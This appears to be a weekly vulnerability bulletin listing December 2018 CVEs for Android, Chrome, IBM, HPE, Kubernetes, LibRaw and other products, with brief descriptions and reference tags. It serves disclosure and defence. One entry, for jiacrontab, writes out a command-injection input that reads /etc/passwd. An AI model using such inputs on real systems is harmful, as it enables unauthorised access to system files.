google — android In ParsePayloadHeader of payload_metadata.cc, there is a possible out of bounds write due to an integer overflow. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113118184. 2018-12-06 not yet calculated CVE-2018-9556
CONFIRM
google — android In impd_parse_loud_eq_instructions of impd_drc_dynamic_payload.c there is a possible out-of-bound write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116020594. 2018-12-07 not yet calculated CVE-2018-9571
CONFIRM
google — android In nfc_llcp_build_sdreq_tlv of llcp_commands.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-73083945. 2018-12-07 not yet calculated CVE-2018-9518
CONFIRM
UBUNTU
UBUNTU
google — android In dumpExtractors of IMediaExtractor.cp, there is a possible disclosure of recently accessed media files due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1. Android ID: A-114770654. 2018-12-06 not yet calculated CVE-2018-9554
BID
CONFIRM
google — android In l2c_lcc_proc_pdu of l2c_fcr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112321180. 2018-12-06 not yet calculated CVE-2018-9555
CONFIRM
google — android In impd_parse_parametric_drc_instructions of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116715245. 2018-12-07 not yet calculated CVE-2018-9576
CONFIRM
google — android In easelcomm_hw_build_scatterlist, there is a possible out of bounds write due to a race condition. This could lead to local escalation of privilege with System privileges required. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-69808833. 2018-12-07 not yet calculated CVE-2018-9519
CONFIRM
google — android In pppol2tp_connect, there is possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-38159931. 2018-12-07 not yet calculated CVE-2018-9517
CONFIRM
google — android In impd_parametric_drc_parse_gain_set_params of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116715937. 2018-12-07 not yet calculated CVE-2018-9577
CONFIRM
google — android In multiple functions of ContentProvider.java, there is a possible permission bypass due to a missing URI validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112555574. 2018-12-06 not yet calculated CVE-2018-9548
BID
CONFIRM
google — android In impd_parse_dwnmix_instructions of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116619387. 2018-12-07 not yet calculated CVE-2018-9575
CONFIRM
google — android In unflatten of GraphicBuffer.cpp, there is a possible bad fd close due to improper input validation. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-114223584. 2018-12-06 not yet calculated CVE-2018-9547
BID
CONFIRM
google — android In MasteringMetadata::Parse of mkvparser.cc there is a possible double free due to an insecure default value. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-116615297. 2018-12-06 not yet calculated CVE-2018-9553
BID
CONFIRM
google — android In ixheaacd_adts_crc_start_reg of ixheaacd_adts_crc_check.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113261928. 2018-12-07 not yet calculated CVE-2018-9578
CONFIRM
google — android In rw_t2t_handle_tlv_detect of rw_t2t_ndef.cc, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC kernel with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112161557. 2018-12-06 not yet calculated CVE-2018-9558
CONFIRM
google — android In readBytes of xltdecwbxml.c, there is a possible out of bounds read due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-16680558. 2018-12-06 not yet calculated CVE-2018-9565
BID
CONFIRM
google — android In process_service_search_rsp of sdp_discovery.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure when connecting to a malicious Bluetooth device with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-74249842. 2018-12-06 not yet calculated CVE-2018-9566
CONFIRM
google — android On Pixel devices there is a bug causing verified boot to show the same certificate fingerprint despite using different signing keys. This may lead to local escalation of privilege if people are relying on those fingerprints to determine what version of the OS the device is running, with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-65543936. 2018-12-06 not yet calculated CVE-2018-9567
BID
CONFIRM
google — android In impd_parse_split_drc_characteristic of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116619337. 2018-12-07 not yet calculated CVE-2018-9574
CONFIRM
google — android In sk_clone_lock of sock.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-113509306. References: Upstream kernel. 2018-12-06 not yet calculated CVE-2018-9568
CONFIRM
google — android In impd_init_drc_decode_post_config of impd_drc_gain_decoder.c there is a possible out-of-bound write due to incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113885537. 2018-12-07 not yet calculated CVE-2018-9569
CONFIRM
google — android In CAacDecoder_Init of aacdecoder.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-112660981. 2018-12-06 not yet calculated CVE-2018-9550
BID
CONFIRM
google — android In impd_parse_drc_ext_v1 of impd_drc_dynamic_payload.c there is a possible out-of-bound write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-115375616. 2018-12-07 not yet calculated CVE-2018-9570
CONFIRM
google — android In bta_ag_do_disc of bta_ag_sdp.cc, there is a possible out-of-bound read due to an incorrect parameter size. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-113164621. 2018-12-06 not yet calculated CVE-2018-9562
CONFIRM
google — android In really_install_package of install.cpp, there is a possible free of arbitrary memory due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2. Android ID: A-35385357. 2018-12-06 not yet calculated CVE-2018-9557
CONFIRM
google — android In impd_parse_filt_block of impd_drc_dynamic_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116467350. 2018-12-07 not yet calculated CVE-2018-9573
CONFIRM
google — android In HID_DevAddRecord of hidd_api.cc, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth service with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-79946737. 2018-12-06 not yet calculated CVE-2018-9560
CONFIRM
google — android In impd_drc_parse_coeff of impd_drc_static_payload.c there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-116224432. 2018-12-07 not yet calculated CVE-2018-9572
CONFIRM
google — android In persist_set_key and other functions of cryptfs.cpp, there is a possible out-of-bounds write due to an uncaught error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112731440. 2018-12-06 not yet calculated CVE-2018-9559
CONFIRM
google — chrome A lack of host validation in DevTools in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page, if the user is running a remote DevTools debugging server. 2018-12-04 not yet calculated CVE-2018-6101
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome An integer overflow on 32-bit systems in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6092
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
EXPLOIT-DB
google — chrome An integer overflow that lead to a heap buffer-overflow in Skia in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6090
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome An iterator-invalidation bug in PDFium in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. 2018-12-04 not yet calculated CVE-2018-6088
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A use-after-free in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6087
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Re-entry of a destructor in Networking Disk Cache in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6085
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6108
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Inappropriate setting of the SEE_MASK_FLAG_NO_UI flag in file downloads in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially bypass OS malware checks via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6115
BID
CONFIRM
MISC
GENTOO
google — chrome Inappropriate dismissal of file picker on keyboard events in Blink in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to read local files via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6095
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A double-eviction in the Incognito mode cache that lead to a user-after-free in Networking Disk Cache in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to execute arbitrary code via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6086
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Inline metadata in GarbageCollection in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6094
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome The implementation of the Page.downloadBehavior backend unconditionally marked downloaded files as safe, regardless of file type in Google Chrome prior to 66.0.3359.106 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted HTML page and user interaction. 2018-12-04 not yet calculated CVE-2018-6152
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6104
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A stagnant permission prompt in Prompts in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to bypass permission policy via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6103
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6098
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Missing confusable characters in Internationalization in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6102
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in Omnibox in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6105
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome Incorrect handling of confusable characters in URL Formatter in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name. 2018-12-04 not yet calculated CVE-2018-6107
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A lack of CORS checks in Blink in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to leak limited cross-origin data via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6099
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome A nullptr dereference in WebAssembly in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6116
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
google — chrome
 
A lack of CORS checks, after a Service Worker redirected to a cross-origin PDF, in Service Worker in Google Chrome prior to 66.0.3359.106 allowed a remote attacker to leak limited cross-origin data via a crafted HTML page. 2018-12-04 not yet calculated CVE-2018-6089
BID
REDHAT
CONFIRM
MISC
GENTOO
DEBIAN
hashicorp — vault HashiCorp Vault before 1.0.0 writes the master key to the server log in certain unusual or misconfigured scenarios in which incorrect data comes from the autoseal mechanism without an error being reported. 2018-12-05 not yet calculated CVE-2018-19786
CONFIRM
hitshop — hitshop An issue was discovered in hitshop through 2014-07-15. There is an elevation-of-privilege vulnerability (that allows control over the whole web site) via the admin.php/user/add URI because a storekeeper account (which is supposed to have only privileges for commodity management) can add an administrator account. 2018-12-04 not yet calculated CVE-2018-19853
MISC
hpe — integrated_lights-out_5 A security vulnerability in HPE Integrated Lights-Out 5 (iLO 5) prior to v1.37 could be locally exploited to bypass the security restrictions for firmware updates. 2018-12-03 not yet calculated CVE-2018-7113
SECTRACK
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to remote buffer overflow in dbman leading to code execution. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7114
SECTRACK
MISC
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to a remote denial of service via dbman Opcode 10003 ‘Filename’. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7116
SECTRACK
MISC
CONFIRM
hpe — intelligent_management_center HPE Intelligent Management Center (IMC) prior to IMC PLAT 7.3 (E0605P06) is vulnerable to a remote buffer overflow in dbman.exe opcode 10001 on Windows. This problem is resolved in IMC PLAT 7.3 (E0605P06) or subsequent versions. 2018-12-03 not yet calculated CVE-2018-7115
SECTRACK
MISC
CONFIRM
hpe — multiple_servers The HPE-provided Windows firmware installer for certain Gen9, Gen8, G7,and G6 HPE servers allows local disclosure of privileged information. This issue was resolved in previously provided firmware updates as follows. The HPE Windows firmware installer was updated in the system ROM updates which also addressed the original Spectre/Meltdown set of vulnerabilities. At that time, the Windows firmware installer was also updated in the versions of HPE Integrated Lights-Out 2, 3, and 4 (iLO 2, 3, and 4) listed in the security bulletin. The updated HPE Windows firmware installer was released in the system ROM and HPE Integrated Lights-Out (iLO) releases documented in earlier HPE Security Bulletins: HPESBHF03805, HPESBHF03835, HPESBHF03831. Windows-based systems that have already been updated to the system ROM or iLO versions described in these security bulletins require no further action. 2018-12-03 not yet calculated CVE-2018-7112
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
huawei — p20_smartphones There is an out-of-bounds write vulnerability on Huawei P20 smartphones with versions before 8.1.0.171(C00). The software does not handle the response message properly when the user doing certain inquiry operation, an attacker could send crafted message to the device, successful exploit could cause a denial of service condition. 2018-12-04 not yet calculated CVE-2018-7987
CONFIRM
huawei — vip_app Huawei VIP App is a mobile app for Malaysia customers that purchased P20 Series, Nova 3/3i and Mate 20. There is a vulnerability in versions before 4.0.5 that attackers can conduct bruteforce to the VIP App Web Services to get user information. 2018-12-04 not yet calculated CVE-2018-7956
CONFIRM
hunan_jinyun_network_technology — pbootcms SearchController.php in PbootCMS 1.2.1 has SQL injection via the index.php/Search/index.html query string. 2018-12-05 not yet calculated CVE-2018-19893
MISC
ibm — campaign IBM Campaign 9.1.0 and 9.1.2 could allow a local user to obtain admini privileges due to the application not validating access permissions. IBM X-Force ID: 153382. 2018-12-05 not yet calculated CVE-2018-1941
XF
CONFIRM
ibm — connections IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315. 2018-12-06 not yet calculated CVE-2018-1935
BID
XF
CONFIRM
ibm — connections IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker’s domain. IBM X-Force ID: 152456. 2018-12-07 not yet calculated CVE-2018-1896
XF
CONFIRM
ibm — datapower_gateways IBM DataPower Gateways 7.5, 7.5.1, 7.5.2, 7.6, and 2018.4 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 144889. 2018-12-07 not yet calculated CVE-2018-1663
XF
CONFIRM
ibm — db2_for_linux_unix_and_windows IBM DB2 for Linux, UNIX and Windows 9.7, 10.1, 10.5., and 11.1 db2pdcfg is vulnerable to a stack based buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 152462. 2018-11-30 not yet calculated CVE-2018-1897
CONFIRM
BID
SECTRACK
XF
ibm — financial_transaction_manager_for_digital_payments_for_multi-platform IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.0, 3.0.2, and 3.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151329. 2018-12-06 not yet calculated CVE-2018-1871
CONFIRM
XF
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim’s click actions and possibly launch further attacks against the victim. IBM X-Force ID: 141340. 2018-12-06 not yet calculated CVE-2018-1504
XF
CONFIRM
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict Transport Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. IBM X-Force ID: 142117. 2018-12-06 not yet calculated CVE-2018-1525
XF
CONFIRM
ibm — i2_enterprise_insight_analysis IBM i2 Enterprise Insight Analysis 2.1.7 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 141413. 2018-12-06 not yet calculated CVE-2018-1505
XF
CONFIRM
ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2 and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 152855. 2018-12-07 not yet calculated CVE-2018-1920
CONFIRM
XF
ibm — marketing_platform IBM Marketing Platform 9.1.0, 9.1.2, and 10.1 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 139029. 2018-12-07 not yet calculated CVE-2018-1424
CONFIRM
XF
ibm — maximo_asset_mangement IBM Maximo Asset Management 7.6 could allow an authenticated user to enumerate usernames using a specially crafted HTTP request. IBM X-Force ID: 145966. 2018-12-05 not yet calculated CVE-2018-1697
XF
CONFIRM
ibm — mq_and_console_rest_api A problem within the IBM MQ 9.0.2, 9.0.3, 9.0.4, 9.0.5, and 9.1.0.0 Console REST API Could allow attackers to execute a denial of service attack preventing users from logging into the MQ Console REST API. IBM X-Force ID: 151969. 2018-12-07 not yet calculated CVE-2018-1883
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 uses hard-coded credentials which could allow an attacker to bypass the authentication configured by the administrator. IBM X-Force ID: 144656. 2018-12-05 not yet calculated CVE-2018-1650
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 143118. 2018-12-05 not yet calculated CVE-2018-1568
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 147707. 2018-12-05 not yet calculated CVE-2018-1728
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 147709. 2018-12-05 not yet calculated CVE-2018-1730
XF
CONFIRM
ibm — qradar_siem IBM QRadar SIEM 1.14.0 discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. IBM X-Force ID: 147810. 2018-12-05 not yet calculated CVE-2018-1732
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2 and 7.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 144653. 2018-12-05 not yet calculated CVE-2018-1648
CONFIRM
XF
ibm — qradar_siem IBM QRadar SIEM 7.2.8 and 7.3 does not validate, or incorrectly validates, a certificate. This weakness might allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. IBM X-force ID: 133120. 2018-12-05 not yet calculated CVE-2017-1622
XF
CONFIRM
ibm — websphere_application_server IBM WebSphere Application Server 8.5 and 9.0 could allow a remote attacker to gain elevated privileges on the system, caused when a security domain is configured to use a federated repository other than global federated repository and then migrated to a newer release of WebSphere Application Server. IBM X-Force ID: 150813. 2018-12-03 not yet calculated CVE-2018-1840
XF
CONFIRM
intelliants — subrion_cms Subrion CMS v4.2.1 allows XSS via the panel/configuration/general/ SITE TITLE parameter. 2018-12-04 not yet calculated CVE-2018-16631
MISC
intelliants — subrion_cms panel/uploads/#elf_l1_XA in Subrion CMS v4.2.1 allows XSS via an SVG file with JavaScript in a SCRIPT element. 2018-12-04 not yet calculated CVE-2018-16629
MISC
intel — integrated performance primitives Data leakage in cryptographic libraries for Intel IPP before 2019 update1 release may allow an authenticated user to potentially enable information disclosure via local access. 2018-12-05 not yet calculated CVE-2018-12155
CONFIRM
internet2 — grouper Cross-site scripting (XSS) vulnerability in UiV2Public.index in Internet2 Grouper 2.2 and 2.3 allows remote attackers to inject arbitrary web script or HTML via the code parameter. 2018-12-03 not yet calculated CVE-2018-19794
MISC
MISC
MISC

jiacrontab — jiacrontab

jiacrontab 1.4.5 allows remote attackers to execute arbitrary commands via the crontab/task/edit?addr=localhost%3a20001 command and args parameters, as demonstrated by command=cat&args=/etc/passwd in the POST data. 2018-12-03 not yet calculated CVE-2018-19793
MISC
kubernetes — kubernetes In Kubernetes versions 1.9.0-1.9.9, 1.10.0-1.10.5, and 1.11.0-1.11.1, user input was handled insecurely while setting up volume mounts on Windows nodes, which could lead to command line argument injection. 2018-12-05 not yet calculated CVE-2018-1002101
CONFIRM
kubernetes — kubernetes In all Kubernetes versions prior to v1.10.11, v1.11.5, and v1.12.3, incorrect handling of error responses to proxied upgrade requests in the kube-apiserver allowed specially crafted requests to establish a connection through the Kubernetes API server to backend servers, then send arbitrary requests over the same connection directly to the backend, authenticated with the Kubernetes API server’s TLS credentials used to establish the backend connection. 2018-12-05 not yet calculated CVE-2018-1002105
BID
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
REDHAT
MISC
CONFIRM
CONFIRM
kubernetes — kubernetes In Minikube versions 0.3.0-0.29.0, minikube exposes the Kubernetes Dashboard listening on the VM IP at port 30000. In VM environments where the IP is easy to predict, the attacker can use DNS rebinding to indirectly make requests to the Kubernetes Dashboard, create a new Kubernetes Deployment running arbitrary code. If minikube mount is in use, the attacker could also directly access the host filesystem. 2018-12-05 not yet calculated CVE-2018-1002103
CONFIRM
libraw — libraw An error within the “LibRaw::xtrans_interpolate()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.6 can be exploited to cause an invalid read memory access and subsequently a Denial of Service condition. 2018-12-07 not yet calculated CVE-2017-16910
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw A boundary error within the “quicktake_100_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to cause a stack-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5805
REDHAT
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “leaf_hdr_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5806
REDHAT
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “LibRaw::unpack()” function (src/libraw_cxx.cpp) in LibRaw versions prior to 0.18.7 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5801
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “kodak_radc_load_raw()” function (internal/dcraw_common.cpp) related to the “buf” variable in LibRaw versions prior to 0.18.7 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5802
REDHAT
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An integer overflow error within the “parse_qt()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.12 can be exploited to trigger an infinite loop via a specially crafted Apple QuickTime file. 2018-12-07 not yet calculated CVE-2018-5815
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An integer overflow error within the “identify()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.12 can be exploited to trigger a division by zero via specially crafted NOKIARAW file (Note: This vulnerability is caused due to an incomplete fix of CVE-2018-5804). 2018-12-07 not yet calculated CVE-2018-5816
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “samsung_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause an out-of-bounds read memory access and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5807
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “LibRaw::parse_exif()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a stack-based buffer overflow and subsequently execute arbitrary code. 2018-12-07 not yet calculated CVE-2018-5809
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “find_green()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a stack-based buffer overflow and subsequently execute arbitrary code. 2018-12-07 not yet calculated CVE-2018-5808
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “nikon_coolscan_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to trigger a NULL pointer dereference. 2018-12-07 not yet calculated CVE-2018-5812
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw A type confusion error within the “identify()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.8 can be exploited to trigger a division by zero. 2018-12-07 not yet calculated CVE-2018-5804
MISC
MISC
SECUNIA
MISC
libraw — libraw An error within the “parse_minolta()” function (dcraw/dcraw.c) in LibRaw versions prior to 0.18.11 can be exploited to trigger an infinite loop via a specially crafted file. 2018-12-07 not yet calculated CVE-2018-5813
MISC
MISC
SECUNIA
MISC
UBUNTU
libraw — libraw An error within the “rollei_load_raw()” function (internal/dcraw_common.cpp) in LibRaw versions prior to 0.18.9 can be exploited to cause a heap-based buffer overflow and subsequently cause a crash. 2018-12-07 not yet calculated CVE-2018-5810
MISC
MISC
SECUNIA
MISC
UBUNTU
